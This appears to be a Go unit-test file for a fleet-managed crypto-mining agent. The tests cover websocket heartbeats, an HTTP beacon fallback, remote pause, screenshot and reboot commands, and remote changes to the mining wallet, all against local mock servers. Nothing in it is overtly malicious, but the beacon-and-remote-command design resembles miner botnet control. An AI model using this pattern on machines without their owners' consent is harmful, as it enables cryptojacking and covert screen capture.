go func() { _ = chain.Run(ctx) }()
|
||||
|
||||
agent := &Agent{
|
||||
serverURL: srv.URL,
|
||||
secret: secret,
|
||||
hostID: "host-ws-test",
|
||||
hostname: "test-host",
|
||||
chain: chain,
|
||||
}
|
||||
|
||||
agentCtx, agentCancel := context.WithTimeout(context.Background(), 10*time.Second)
|
||||
defer agentCancel()
|
||||
|
||||
errCh := make(chan error, 1)
|
||||
go func() {
|
||||
errCh <- agent.connect(agentCtx)
|
||||
}()
|
||||
|
||||
select {
|
||||
case <-connected:
|
||||
case err := <-errCh:
|
||||
t.Fatalf("connect failed: %v", err)
|
||||
case <-time.After(5 * time.Second):
|
||||
t.Fatal("mock server did not receive agent connection")
|
||||
}
|
||||
|
||||
waitForAgentConn(t, agent, 2*time.Second)
|
||||
if err := agent.sendHeartbeat(); err != nil {
|
||||
t.Fatalf("send heartbeat: %v", err)
|
||||
}
|
||||
|
||||
select {
|
||||
case err := <-errCh:
|
||||
if err != nil && agentCtx.Err() == nil {
|
||||
t.Fatalf("connect ended: %v", err)
|
||||
}
|
||||
case <-time.After(4 * time.Second):
|
||||
agentCancel()
|
||||
<-errCh
|
||||
}
|
||||
|
||||
mu.Lock()
|
||||
defer mu.Unlock()
|
||||
if heartbeats < 1 {
|
||||
t.Fatalf("expected at least one heartbeat, got %d", heartbeats)
|
||||
}
|
||||
if len(commands) < 3 {
|
||||
t.Fatalf("expected pause/screenshot/reboot commands, got %v", commands)
|
||||
}
|
||||
}
|
||||
|
||||
func TestAgentBeaconFallbackCommands(t *testing.T) {
|
||||
const secret = "beacon-test-secret"
|
||||
var received []string
|
||||
|
||||
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
if r.URL.Path != "/api/v1/fleet/beacon" {
|
||||
http.NotFound(w, r)
|
||||
return
|
||||
}
|
||||
if strings.TrimPrefix(r.Header.Get("Authorization"), "Bearer ") != secret {
|
||||
http.Error(w, "unauthorized", http.StatusUnauthorized)
|
||||
return
|
||||
}
|
||||
received = append(received, r.Method)
|
||||
_ = json.NewEncoder(w).Encode(types.BeaconResponse{
|
||||
OK: true,
|
||||
Commands: []types.FleetCommand{
|
||||
{ID: "b1", Action: "pause"},
|
||||
{ID: "b2", Action: "screenshot"},
|
||||
},
|
||||
})
|
||||
}))
|
||||
defer srv.Close()
|
||||
|
||||
chain := mining.NewChain(policy.DefaultMiningProfile("beacon-wallet"), mining.DefaultChainConfig())
|
||||
agent := &Agent{
|
||||
serverURL: srv.URL,
|
||||
secret: secret,
|
||||
chain: chain,
|
||||
}
|
||||
|
||||
agent.beaconFallback()
|
||||
|
||||
if len(received) != 1 || received[0] != http.MethodPost {
|
||||
t.Fatalf("expected one beacon POST, got %v", received)
|
||||
}
|
||||
}
|
||||
|
||||
func TestAgentSendHeartbeatPayload(t *testing.T) {
|
||||
upgrader := websocket.Upgrader{CheckOrigin: func(r *http.Request) bool { return true }}
|
||||
got := make(chan []byte, 1)
|
||||
|
||||
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
conn, err := upgrader.Upgrade(w, r, nil)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
defer conn.Close()
|
||||
_, data, err := conn.ReadMessage()
|
||||
if err == nil {
|
||||
got <- data
|
||||
}
|
||||
}))
|
||||
defer srv.Close()
|
||||
|
||||
wsURL := "ws" + strings.TrimPrefix(srv.URL, "http")
|
||||
conn, _, err := websocket.DefaultDialer.Dial(wsURL, nil)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
defer conn.Close()
|
||||
|
||||
chain := mining.NewChain(policy.DefaultMiningProfile("hb-wallet"), mining.DefaultChainConfig())
|
||||
agent := &Agent{chain: chain, conn: conn}
|
||||
|
||||
if err := agent.sendHeartbeat(); err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
|
||||
select {
|
||||
case payload := <-got:
|
||||
var msg map[string]any
|
||||
if err := json.Unmarshal(payload, &msg); err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
if msg["type"] != "heartbeat" {
|
||||
t.Fatalf("type: got %v", msg["type"])
|
||||
}
|
||||
if msg["hostname"] == nil {
|
||||
t.Fatal("expected hostname in heartbeat")
|
||||
}
|
||||
case <-time.After(2 * time.Second):
|
||||
t.Fatal("heartbeat not received by mock server")
|
||||
}
|
||||
}
|
||||
|
||||
func waitForAgentConn(t *testing.T, agent *Agent, timeout time.Duration) {
|
||||
t.Helper()
|
||||
deadline := time.Now().Add(timeout)
|
||||
for time.Now().Before(deadline) {
|
||||
agent.mu.Lock()
|
||||
ok := agent.conn != nil
|
||||
agent.mu.Unlock()
|
||||
if ok {
|
||||
return
|
||||
}
|
||||
time.Sleep(20 * time.Millisecond)
|
||||
}
|
||||
t.Fatal("agent websocket not connected")
|
||||
}
|
||||
|
||||
func TestHandleCommandPauseStopsChain(t *testing.T) {
|
||||
chain := mining.NewChain(policy.DefaultMiningProfile("pause-wallet"), mining.DefaultChainConfig())
|
||||
agent := &Agent{chain: chain}
|
||||
agent.handleCommand(types.FleetCommand{ID: "1", Action: "pause"})
|
||||
chain.Stop()
|
||||
}
|
||||
|
||||
func TestHandleCommandMiningProfile(t *testing.T) {
|
||||
chain := mining.NewChain(policy.DefaultMiningProfile("old-wallet"), mining.DefaultChainConfig())
|
||||
agent := &Agent{chain: chain}
|
||||
|
||||
profile := types.MiningProfile{
|
||||
WalletAddress: "new-wallet",
|
||||
Tiers: []types.MiningTierSpec{
|
||||
{Type: "stratum", Duration: 1},
|
||||
},
|
||||
}
|
||||
raw, _ := json.Marshal(profile)
|
||||
var profileArg map[string]any
|
||||
_ = json.Unmarshal(raw, &profileArg)
|
||||
|
||||
agent.handleCommand(types.FleetCommand{
|
||||
ID: "profile-1",
|
||||
Action: "mining_profile",
|
||||
Args: map[string]any{"profile": profileArg},
|
||||
})
|
||||
|
||||
updated := chain.Profile()
|
||||
if updated.WalletAddress != "new-wallet" {
|
||||
t.Fatalf("wallet: got %q want new-wallet", updated.WalletAddress)
|
||||
}
|
||||
if len(updated.Tiers) != 1 || updated.Tiers[0].Type != "stratum" {
|
||||
t.Fatalf("tiers not updated: %+v", updated.Tiers)
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user